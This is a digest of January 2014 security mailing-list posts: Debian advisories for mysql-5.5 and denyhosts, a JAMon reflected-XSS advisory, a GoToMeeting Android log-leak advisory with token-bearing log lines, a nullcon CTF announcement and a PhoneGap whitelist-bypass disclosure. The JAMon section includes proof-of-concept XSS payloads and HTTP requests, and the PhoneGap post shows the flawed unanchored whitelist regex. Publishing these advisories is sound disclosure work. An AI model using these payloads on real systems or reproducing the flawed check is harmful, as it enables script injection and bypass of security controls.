[SECURITY] [DSA 2848-1] mysql-5.5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2848-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso January 23, 2014 http://www.debian.org/security/faq - - Package: mysql-5.5 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-5891 CVE-2013-5908 CVE-2014-0386 CVE-2014-0393 CVE-2014-0401 CVE-2014-0402 CVE-2014-0412 CVE-2014-0420 CVE-2014-0437 Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.35. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details: http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-34.html http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-35.html http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html For the stable distribution (wheezy), these problems have been fixed in version 5.5.35+dfsg-0+wheezy1. For the unstable distribution (sid), these problems have been fixed in version 5.5.35+dfsg-1. We recommend that you upgrade your mysql-5.5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJS4Tb/AAoJEAVMuPMTQ89ET1kP/1XFwa9nlAU1CUOVZc5kBuAV EgQVQRKpfclCqZ1nKpxb5oNlEkU8EyT1JRmQ0bK9Hwqt61hBIbt5S3aKnvWyA+oC dGIKBeaLbhbRcPGUiDbF2eSiqh+f+QNAypoc5cDDlcQBXPA667KNeP3on0ZUts/m RY7dzJmrh013TDdhaKvUxq86lOZgUxwvWAtjJjnEzKMPSM9d3nueVtKwge/H4YJh KULTysQa5MAAQmKQ03mkbKRbBZ3UKo74xwgGeKctFLsysKeivY/WQSFPBexnwBx+ ZbU1XK3t5zfVyWLkSzL5aqKchFWxmTGnMSdEnRmz/zotiSeLTsT8KErdtREbu5zP 3Ixe9PtpgLoJ6QRDiJUVNrZTnSJ2GOmDHMAtWUhqLYzGjKviM1JiqdVusOpzvODI Go8XApADvUG5JrPO1oZR+1CfcX3RaYWJDJQbwJ7s9uU9ATIc+y5HWUkGGRES8CBG iMUJDe3Wwxic/wS2r/SJkBlhINHy7CrOzGic+blF3+qXcH4R5qcCcfGmQ/EmKpqo nC2mfqCIu7mnQq7VrmGbEJOdohm4g43iQz8Dwckl9aTYuu+vG2UzTYRKUhx+jLhZ e4PGso/Sm5X4nMgqo8GEEqhO3z4VrtWrsH0NewSrfn8XYz9hyMd1cQgVjV4H0M7u iWdDB6CHFSSuL7O919Pd =AfR1 -END PGP SIGNATURE-
[CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7
### 01. ### Advisory Information ### Title: Multiple Reflected XSS vulnerabilities in JAMon Date published: 2013-01-23 Date of last update: 2013-01-23 Vendors contacted: JAMon v 2.7 Discovered by: Christian Catalano Severity: Low 02. ### Vulnerability Information ### CVE reference: CVE-2013-6235 CVSS v2 Base Score: 4.3 CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) Component/s: JAMon v 2.7 Class: Input Manipulation 03. ### Introduction ### The Java Application Monitor (JAMon) is a free, simple, high performance, thread safe, Java API that allows developers to easily monitor production applications. http://jamonapi.sourceforge.net 04. ### Vulnerability Description ### Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been identified in the JAMon web application. JAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks. This flaw exists because certain pages do not validate input before returning it to users. +--+---+ |-Vulnerable module(s)andparameter(s)--| +--+---+ |mondetail.jsp ArraySQL| |mondetail.jsp listenertype| |mondetail.jsp currentlistener-| |jamonadmin.jsp ---ArraySQL| |sql.jsp---ArraySQL| |exceptions.jspArraySQL| +--+---+ 05. ### Technical Description / Proof of Concept Code ### 05.01) Malicious Request (ArraySQL parameter): The vulnerability is located in the ' Filter (optional) ' input field upon submission to the pages http://localhost/jamon/mondetail.jsp http://localhost/jamon/ jamonadmin.jsp http://localhost/jamon/ sql.jsp http://localhost/jamon/ exceptions.jsp The application does not validate the 'ArraySQL' parameter upon submission to the *.jsp scripts. The attacker can inject the malicious javascript code: 1--1ScRiPt alert('XSS')/ScRiPt!-- in the ' Filter (optional) ' input field and click on GO! button. 05.02) Malicious Request (listenertype parameter) POST /jamon/mondetail.jsp HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/jamon/mondetail.jsp Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 209 listenertype=1--1ScRiPtalert('XSS')/ScRiPt!--currentlistener=JAMonBufferListeneroutputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21 05.03) Malicious Request (currentlistener parameter) POST /jamon/mondetail.jsp HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/jamon/mondetail.jsp Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 195 listenertype=valuecurrentlistener=1--1ScRiPtalert('XSS')/ScRiPt!--outputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21 06. ### Business Impact ### This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server. 07. ### Systems Affected ### This vulnerability was tested against: JAMon v2.7 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### Currently, there are no known upgrades or patches to correct this vulnerability. 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 18th, 2013: Vulnerability identification October 22th, 2013: Vendor notification [JAMon] December 10th, 2013: Vulnerability confirmation [JAMonI] January 23th, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ###
[SECURITY] [DSA 2826-2] denyhosts regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2826-2 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez January 23, 2014 http://www.debian.org/security/faq - - Package: denyhosts Vulnerability : regression Debian Bug : 734329 CVE ID : CVE-2013-6890 A regression has been found on the denyhosts packages fixing CVE-2013-6890. This regression could cause an attempted breakin attempt to be missed by denyhosts, which would then fail to enforce a ban. For the oldstable distribution (squeeze), this problem has been fixed in version 2.6-7+deb6u3. For the stable distribution (wheezy), this problem has been fixed in version 2.6-10+deb7u3. For the testing (jessie) and unstable (sid) distribution, the package denyhosts has been removed, and its users are encouraged to switch to an alternative like fail2ban. We recommend that you upgrade your denyhosts packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) iQF8BAEBCgBmBQJS4ZGvXxSAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXQ5NzQ1QjAyMjczMjM4MUZFOUU3RUFGRjU2 RERCNTNGMkE2NzVDMEE1AAoJEG3bU/KmdcClexkH/1iQEL46p01Ckgz7hUySWgnZ ioiZCbrLFRKCYyS04Z0PNb0C4aAWLoFXtzUxU372KUTLhJQFrsTdI58j+eanD4+x PXEPpk0o+4ZO4eFcQSd0kKfXmOdZlgrc4q541hv5xIgPf9rdIkP5YQwcyk1lxXMs 7DvwPhsaWr+NpqyC4AeAlFMTbq7Wi0LZ8FQb7JJIrFP2dJ1BHRcyoi4EYjzhUcNA aI8nedfJqf2TLYBlZauBuIFXqHqmQp78Rf1+geJfpX64OebMb9iufSgVoU79Rbgi u3AS1/ynpN/2X9t3jCBjhZkY5BSMB8/EtheRNeYRLXLLoxmNudm2vzV1jOYLngM= =sZxV -END PGP SIGNATURE-
[CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output (Android)
1. ADVISORY INFORMATION Title: GoToMeeting Information Disclosure via Logging Output (Android) CVE: CVE-2014-1664 CVE Information: ASSIGNED Date published: PUBLIC Date of last update: 01/23/2014 Vendor Contacted: Citrix Release mode: Coordinated Release 2. VULNERABILITY INFORMATION = Class: Information Disclosure Impact: CVSS Details specified below Remotely Exploitable: No Locally Exploitable: Yes CVE Name: [CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output (Android) 3. VULNERABILITY DESCRIPTION The latest release of the software is vulnerable to information disclosure via logging output, resulting in the leak of userID, meeting details, and authentication tokens. Android applications with permissions to read system log files may obtain the leaked information. 4. VULNERABLE PACKAGES == - com.citrixonline.android.gotomeeting-1.apk version 5.0.799.1238 (Android) 5. NON-VULNERABLE PACKAGES == - other platforms untested 6. CREDITS === This vulnerability was discovered and researched by Claudio J. Lacayo. 7. TECHNICAL DESCRIPTION / PROOF OF CONCEPT CODE = ! - SNIPPET --- ! D/G2M (32190): HttpRequest to: https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED] E/qcom_sensors_hal( 787): hal_process_report_ind: Bad item quality: 11 D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms D/G2M (32190): HttpRequest response from: GET https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED] - 200 D/G2M (32190): HttpRequest response body: GET https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED] - {Status:Redirect,RedirectHost:www1.gotomeeting.com,MeetingId:[MEETING_ID_REDACTED]} D/G2M (32190): Got 302 from legacy JSON API: www1.gotomeeting.com D/G2M (32190): HttpRequest to: https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED] D/G2M (32190): HttpRequest response from: GET https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED] - 200 D/G2M (32190): HttpRequest response body: GET https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED] - {Status:MeetingNotStarted,MeetingId:[MEETING_ID_REDACTED],IsRecurring:false,Endpoints:[Native],OrganizerName:[REDACTED],Subject:[REDACTED],MaxAttendees:100,IsWebinar:false,AudioParameters:{CommParams:{disableUdp:false},ConferenceParams:{supportedModes:VoIP,PSTN,Private,initialMode:Hybrid,SpeakerInfo:{PhoneInfo:[{description:Default,number:[REDACTED],authToken:AAFe4rYexu4Dm7qrL45/Egx+AFLdeSkAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa,accessCode:REDACTED},userId:userId,authToken:EAEBAQEBAQEBAQEBAQEBAQE=,privateMessage:,audioKey:-1,BridgeMutingControl:true,VCBParams:{Codec:[{payloadType:103,frameLength:30,name:ISAC,bitrate:32000,channels:1,samplingRate:16000},{payloadType:0,frameLength:20,name:PCMU,bitrate:64000,ch annels:1,samplingRate:8000}],VCB:{port:5060,ipAddr:10.23.70.151},Options:{asUpdates:true,rtUpdates:true,dtx:false,EndTime:139023990,StartTime:139023720,IsImpromptu:false} D/G2M (32190): Got response from legacy JSON API: 200 D/G2M (32190): JoinService: Attempting to join Meeting D/G2M (32190): MeetingService: Starting Meeting join on legacy... D/G2M (32190): HttpRequest to: https://www.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a D/G2M (32190): ServiceResolver: COLService: BaseURL [https://www1.gotomeeting.com], isLegacy [true}, isWebinar [false] D/G2M (32190): HttpRequest response from: GET https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a - 302 D/G2M (32190): HttpRequest response body: GET
[CTF] nullcon HackIM 2014 will start at 24-01-2014, when the clock will strike at 11:59 (+5:30 GMT)
· This is blasphemy! This is madness! · Madness? THIS IS HACKIM! · H4x0rs! Ready your breakfast and eat hearty, for tonight, we dine in hell! · No retreat, no surrender. That is H4x0r law. And by H4x0r law, we will stand and fight.. and conquer. n00bs haXors, We are proud to present the sixth edition of HackIM 2014 (http://ctf.nullcon.net) HackIM CTF will starts on 24th Jan 2014 11:59 PM and will last till 26th Jan 2014 11:59 PM (GMT +5.30). We've got se7en categories (Total of whopping 35+ levels!) - Trivia - Crypto - Programming - Web - Reverse Engineering - Exploitation - Forensics Winner gets a free VIP Pass for nullcon Goa 2014 (http://www.nullcon.net). If you've already bought the pass we'll reimburse it. Winner and Top 8 Runner up will get chance to participate in nullcon JailBreak along with 4 nights stay at nullcon JAIL and FREE VIP pass for nullcon, if they choose to participate at nullcon JailBreak challenge. In JailBreak, participants will have to stay under house arrest (12th-13th Feb 2014). JailBreak participants can stay on same venue till 15th of Feb. (even after JailBreak) The unofficial back channel for the CTF is at irc.freenode.net #null0x00 Good luck and have fun :) Special Thanks to the volunteers and supporters without whom this would not have been possible. http://ctf.nullcon.net/madprops.php Cheers nullcon Team http://nullcon.net -- ___ nullcon goa V - spread love... not malware... 12-15th Feb 2014
Security Vulnerabilities in Apache Cordova / PhoneGap
The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap. ## Dear PhoneGap contributors, PhoneGaps domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf. 1. Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGaps internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects. 2. A malicious script running in an iframe can dynamically choose any of PhoneGaps vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack. 3. PhoneGaps whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile(https?://(.*\\.)? + origin)); For example, if foo.com is whitelisted, foo.com.evil.com will pass the check. 4. PhoneGaps domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using script tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin. 5. Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages. We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak to PhoneGaps main branch, please let us know. Thanks, Martin, Suman, and Vitaly ##